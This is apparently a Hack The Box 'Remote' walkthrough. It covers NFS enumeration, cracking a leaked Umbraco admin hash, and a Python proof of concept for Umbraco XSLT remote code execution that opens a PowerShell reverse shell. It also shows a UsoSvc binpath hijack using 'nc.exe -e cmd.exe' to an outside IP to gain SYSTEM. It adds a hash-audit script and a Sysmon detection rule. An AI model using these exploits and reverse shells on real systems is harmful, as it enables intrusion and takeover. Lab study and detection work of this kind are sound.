## Recon

### Nmap Scan

The Nmap results show SMB-related ports, FTP, rpcbind and a web service open.
```
# Nmap 7.80 scan initiated Wed May 20 08:52:04 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.34s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd       1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m28s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-20T00:56:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 08:56:48 2020 -- 1 IP address (1 host up) scanned in 284.46 seconds
```
### NFS

Logging in to port 21 as anonymous turns up nothing, so I judge it to be a rabbit hole. On the web page I find the URL http://10.10.10.180/umbraco/#/login/false?returnPath=%252Fforms, which reveals that the site runs a CMS called Umbraco. Searching shows it has a remote code execution vulnerability (Link Here), but exploiting it requires user credentials. The plan is therefore to find credentials, use the PoC, and get a shell.

The target also exposes rpcbind, and an Nmap scan shows that it exports a directory, site_backups:
```
# Nmap 7.80 scan initiated Wed May 20 09:23:57 2020 as: nmap -p111 --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -oN nmap/nfs 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (1.6s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /site_backups
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID         GID         SIZE   TIME                 FILENAME
| rwx------   4294967294  4294967294  4096   2020-05-19T20:22:57  .
| ??????????  ?           ?           ?      ?                    ..
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:39  App_Browsers
| rwx------   4294967294  4294967294  4096   2020-02-20T17:17:19  App_Data
| rwx------   4294967294  4294967294  4096   2020-02-20T17:16:40  App_Plugins
| rwx------   4294967294  4294967294  8192   2020-02-20T17:16:42  Config
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:40  aspnet_client
| rwx------   4294967294  4294967294  49152  2020-02-20T17:16:42  bin
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:42  css
| rwx------   4294967294  4294967294  152    2018-11-01T17:06:44  default.aspx
|_
| nfs-showmount:
|_  /site_backups
| nfs-statfs:
|   Filesystem     1K-blocks   Used        Available   Use%  Maxfilesize  Maxlink
|_  /site_backups  31119356.0  12288060.0  18831296.0  40%   16.0T        1023

# Nmap done at Wed May 20 09:24:25 2020 -- 1 IP address (1 host up) scanned in 28.45 seconds
```
## Enumeration

After mounting the share locally, I start enumerating.
```
/mnt root@kali ❯ mkdir Remote
/mnt root@kali ❯ mount 10.10.10.180:/site_backups /mnt/Remote
/mnt root@kali 9s ❯ cd Remote
/mnt/Remote root@kali ❯ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config
```
Web.config gives the version number, which matches the one the vulnerability mentioned above requires:
```
~/Documents/HTB/Remote/nfs root@kali ❯ cat Web.config | grep umbracoConfigurationStatus
    <add key="umbracoConfigurationStatus" value="7.12.4" />
```
Umbraco.sdf in App_Data also holds user credentials hashed with SHA1: user `admin` (admin@htb.local), password hash b8be16afba8c314ad33d812f22a04991b90e2aaa.
```
~/Documents/HTB/Remote/nfs/App_Data root@kali ❯ strings Umbraco.sdf | grep @htb.loca
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
```
A hash-cracking tool recovers the password baconandcheese:
```
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
```
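The records above mix two storage formats: the admin account still carries an unsalted SHA1 hash, the format cracked above, while the smith accounts use a salted HMACSHA256. As an added example that is not from the original writeup, the following Python audit parses such fused `strings` output and flags accounts still on a legacy or unsalted format; the field widths (40 hex characters for SHA1, a 24-character base64 salt plus a 44-character base64 digest for HMACSHA256) are inferred from the records shown on this page.

```python
import re

# Formats seen in the Umbraco.sdf strings on this page: legacy users keep an unsalted
# SHA1 hex digest, newer users get a base64 salt (16 bytes -> 24 chars) followed by a
# base64 HMACSHA256 digest (32 bytes -> 44 chars). Widths inferred from those records.
LEGACY_ALGORITHMS = {"SHA1", "MD5"}
HEX_SHA1 = re.compile(r"[0-9a-f]{40}")
SALTED_B64 = re.compile(r"[A-Za-z0-9+/]{22}==[A-Za-z0-9+/]{43}=")
META = re.compile(r'\{"hashAlgorithm":"(?P<alg>[^"]+)"\}')


def classify_record(record):
    """Return (label, algorithm, salted) for one fused membership string, or None."""
    m = META.search(record)
    if m is None:
        return None
    head, alg = record[: m.start()], m.group("alg")
    if HEX_SHA1.fullmatch(head[-40:]):
        return head[:-40], alg, False
    if SALTED_B64.fullmatch(head[-68:]):
        return head[:-68], alg, True
    return head, alg, False  # unknown layout: still report it, treat as unsalted


def is_weak(algorithm, salted):
    """A legacy algorithm or a missing salt makes offline guessing cheap."""
    return algorithm.upper() in LEGACY_ALGORITHMS or not salted


def audit(records):
    """Collapse duplicate rows (the dump repeats users) into one verdict per label."""
    findings = {}
    for rec in records:
        parsed = classify_record(rec)
        if parsed is None:
            continue
        label, alg, salted = parsed
        findings[label] = {"algorithm": alg, "salted": salted, "weak": is_weak(alg, salted)}
    return findings


# Records as `strings Umbraco.sdf` emitted them on this page (login and e-mail are fused
# with no separator, so the label keeps that form); trailing language/GUID fields omitted.
SAMPLE_RECORDS = [
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.local',
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.local',
    'smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.local',
    'ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.local',
]

if __name__ == "__main__":
    for label, verdict in audit(SAMPLE_RECORDS).items():
        print(f"{label}: {verdict}")
```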
## User.txt

Next I edit the PoC. The original PoC runs calc.exe, that is, it launches the calculator. I change it to powershell.exe and add arguments; as covered in my earlier post on PowerShell usage, a base64-encoded reverse shell avoids the escaping problems that quotes would cause. That gives a shell.
```python
import requests
from bs4 import BeautifulSoup


def print_dict(dico):
    print(dico.items())


print("Start")
# XSLT document carrying an inline C# script block; the page's command string is elided.
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "-e 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"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> '

login = "admin@htb.local"
password = "baconandcheese"
host = "http://10.10.10.180"

s = requests.session()
url_main = host + "/umbraco/"
r1 = s.get(url_main)
print_dict(r1.cookies)

# Authenticate to the back office with the recovered credentials.
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
r2 = s.post(url_login, json=loginfo)

# Fetch the XSLT visualizer page to collect the ASP.NET ViewState fields and XSRF token.
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}

data = {
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": "",
    "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT",
}
r4 = s.post(url_xslt, data=data, headers=headers)
print("End")
```
Running the script yields a shell:
```
~/Documents/HTB/Remote root@kali 1m 13s ❯ nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49684.
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd C:\users\public
PS C:\users\public> type uesr.txt
PS C:\users\public> ls


    Directory: C:\users\public


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/19/2020   3:03 PM                Documents
d-r---        9/15/2018   3:19 AM                Downloads
d-r---        9/15/2018   3:19 AM                Music
d-r---        9/15/2018   3:19 AM                Pictures
d-r---        9/15/2018   3:19 AM                Videos
-ar---        5/22/2020   1:13 AM             34 user.txt


PS C:\users\public> type user.txt
16155d17d30cbbe04305511f91460454
PS C:\users\public>
```
## Privilege Escalation

### WinPEAS.exe

After uploading WinPEAS to the target, I find that we have permission to modify a service:
```
[+] Modifiable Services(T1007)
  [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
  LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
  UsoSvc: AllAccess, Start
```
### root.txt

Inspecting the service with `sc qc` shows that we can modify its BINARY_PATH_NAME and thereby run a command of our choosing:
```
C:\users\public\Downloads>sc qc UsoSvc
sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
```
With the following commands I edit UsoSvc's binpath, pointing it at an nc reverse shell, then stop the service and start it again:
```
sc config UsoSvc binpath= "C:\users\public\downloads\nc.exe -e cmd.exe 10.10.14.105 443"
net stop UsoSvc
net start UsoSvc
```
The service hangs at the start stage, and at the same time we get our shell:
```
~/Documents/HTB/Remote/www root@kali ❯ nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49686.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\users\public\Downloads>sc config UsoSvc binpath= "C:\users\public\Downloads\nc.exe -e cmd.exe 10.10.16.38 1337"
sc config UsoSvc binpath= "C:\users\public\Downloads\nc.exe -e cmd.exe 10.10.16.38 1337"
[SC] ChangeServiceConfig SUCCESS

C:\users\public\Downloads>wmic service NAMEOFSERVICE call startservice
wmic service NAMEOFSERVICE call startservice
No Instance(s) Available.

C:\users\public\Downloads>net stop UsoSvc && net start UsoSvc
net stop UsoSvc && net start UsoSvc
The Update Orchestrator Service service is stopping.
The Update Orchestrator Service service was stopped successfully.

The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.
```
```
~/Documents/HTB/Remote/exploit root@kali ❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.180.
Ncat: Connection from 10.10.10.180:49687.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows>cd C:\users\administrator\desktop
cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
7d625f8ef71d3bdf03de7cfa9771e4e6

C:\Users\Administrator\Desktop>
```
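From the defender's side, the `sc config ... binpath=` change above lands as a write to the service's ImagePath registry value, which Sysmon records as Event ID 13 (RegistryEvent, Value Set). As an added example that is not part of the original writeup, the following Python detection runs over constructed Sysmon-style records that mirror UsoSvc's legitimate svchost path and the netcat binpath used here, and flags ImagePath writes whose binary sits under a user-writable directory or whose arguments spawn a shell or carry a literal IP address; the trusted and user-writable root lists are assumptions for this example.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: Value Set) records, not real telemetry.
# Values mirror the page: UsoSvc's legitimate svchost path and the netcat binpath.
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p"},
    {"EventID": 13, "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "C:\\users\\public\\downloads\\nc.exe -e cmd.exe 10.10.14.105 443"},
]

# Assumed policy lists for this example; tune per environment.
IMAGE_PATH_KEY = re.compile(r"\\services\\(?P<svc>[^\\]+)\\imagepath$", re.IGNORECASE)
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files\\")
USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")
SHELL_IN_ARGS = re.compile(r"\b(cmd|powershell)\.exe\b", re.IGNORECASE)
IPV4_IN_ARGS = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def split_command(details):
    """Split an ImagePath into (executable, arguments), honouring a quoted exe path."""
    details = details.strip()
    if details.startswith('"'):
        end = details.find('"', 1)
        return details[1:end], details[end + 1:].strip()
    exe, _, args = details.partition(" ")
    return exe, args


def assess_image_path(details):
    """Return the reasons an ImagePath value looks like a service binary hijack."""
    exe, args = split_command(details)
    reasons = []
    if exe.lower().startswith(USER_WRITABLE_ROOTS):
        reasons.append("binary under a user-writable directory")
    elif not exe.lower().startswith(TRUSTED_ROOTS):
        reasons.append("binary outside trusted roots")
    if SHELL_IN_ARGS.search(args):
        reasons.append("arguments spawn cmd.exe/powershell.exe")
    if IPV4_IN_ARGS.search(args):
        reasons.append("arguments contain a literal IPv4 address")
    return reasons


def detect_service_hijack(events):
    """Keep only ImagePath writes (Event 13) and return one finding per suspicious one."""
    findings = []
    for ev in events:
        m = IMAGE_PATH_KEY.search(ev.get("TargetObject", ""))
        if ev.get("EventID") != 13 or m is None:
            continue
        reasons = assess_image_path(ev.get("Details", ""))
        if reasons:
            findings.append({"service": m.group("svc"), "image_path": ev["Details"], "reasons": reasons})
    return findings
```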